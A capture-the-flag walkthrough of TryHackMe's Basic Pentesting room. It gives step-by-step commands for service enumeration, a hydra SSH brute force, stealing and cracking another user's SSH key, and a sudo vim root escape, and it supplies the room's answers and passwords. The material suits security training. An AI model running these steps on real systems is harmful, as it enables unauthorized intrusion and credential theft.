THM: Basic Pentesting Walkthrough
TryHackMe's Basic Pentesting room is an excellent starting point for anyone new to penetration testing. This walkthrough covers the methodology and thinking process.
Room Information
- Name: Basic Pentesting
- Platform: TryHackMe
- Difficulty: Easy
- Skills: Enumeration, SMB, SSH, Linux PrivEsc
Task 1: Enumeration
Deploy the Machine
Start the machine and note the IP address.
Nmap Scan
nmap -sC -sV -oN nmap/initial 10.10.X.X
Results:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2
80/tcp open http Apache httpd 2.4.18
139/tcp open netbios-ssn Samba smbd 3.X
445/tcp open netbios-ssn Samba smbd 4.3.11
8009/tcp open ajp13 Apache Jserv
8080/tcp open http Apache Tomcat 9.0.7
Task 2: Web Enumeration
Apache (Port 80)
Visiting port 80 shows a default page. Let's run directory enumeration:
gobuster dir -u http://10.10.X.X -w /usr/share/wordlists/dirb/common.txt
Found: /development/ directory
Exploring /development
Contains two text files:
dev.txt- Mentions "J" and "K" are working on the projectj.txt- Notes that "K" set up the password for the share
This gives us potential usernames: j and k
Apache Tomcat (Port 8080)
Default Tomcat page. Attempting default credentials on /manager fails.
Task 3: SMB Enumeration
Listing Shares
smbclient -L //10.10.X.X -N
Shares found:
Anonymous READ
IPC$ NO ACCESS
Accessing Anonymous Share
smbclient //10.10.X.X/Anonymous -N
Downloading files:
get staff.txt
Contents reveal potential username patterns.
Enum4linux
enum4linux -a 10.10.X.X
Confirms users: jan and kay
Task 4: Brute Forcing SSH
With usernames identified, let's try SSH brute force:
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.X.X -t 4
Found: jan:armando
SSH Access
ssh jan@10.10.X.X
We're in as jan.
Task 5: User Enumeration
Exploring the System
ls -la /home/
Two users: jan and kay
cat /etc/passwd | grep bash
Finding Kay's SSH Key
ls -la /home/kay/
The .ssh directory is readable!
cat /home/kay/.ssh/authorized_keys
cat /home/kay/.ssh/id_rsa
Copy the private key to your machine.
Task 6: Cracking SSH Key
Using ssh2john
python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
Cracking with John
john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Found: beeswax
SSH as Kay
chmod 600 id_rsa
ssh -i id_rsa kay@10.10.X.X
Password: beeswax
Task 7: Privilege Escalation
Enumeration
sudo -l
Kay can run /bin/vim as root without a password!
GTFOBins
Check GTFOBins for vim privilege escalation:
sudo vim -c ':!/bin/bash'
Root!
whoami
# root
Read the final flag:
cat /root/pass.bak
Questions & Answers
- What is the name of the hidden directory on the web server?
development - What is the name of the user that was identified with SSH brute force?
jan - What is Jan's password?
armando - What service can be used to escalate to root?
vim - What is the root's password? [Found in pass.bak]
Methodology Summary
- Reconnaissance - Identify open ports and services
- Enumeration - Gather detailed information from each service
- Exploitation - Use gathered information to gain access
- Privilege Escalation - Elevate from user to root
- Documentation - Record findings and methods
Key Takeaways
For Beginners
- Always enumerate thoroughly before exploiting
- Check file permissions carefully
- GTFOBins is your friend for privilege escalation
- Take notes as you go
Security Lessons
- Never reuse passwords across services
- Protect SSH private keys
- Restrict sudo privileges carefully
- Don't expose sensitive directories
Tools Used
- nmap
- gobuster
- smbclient
- enum4linux
- hydra
- john
- ssh
New to penetration testing? Check out our beginner resources at m1k3@msquarellc.net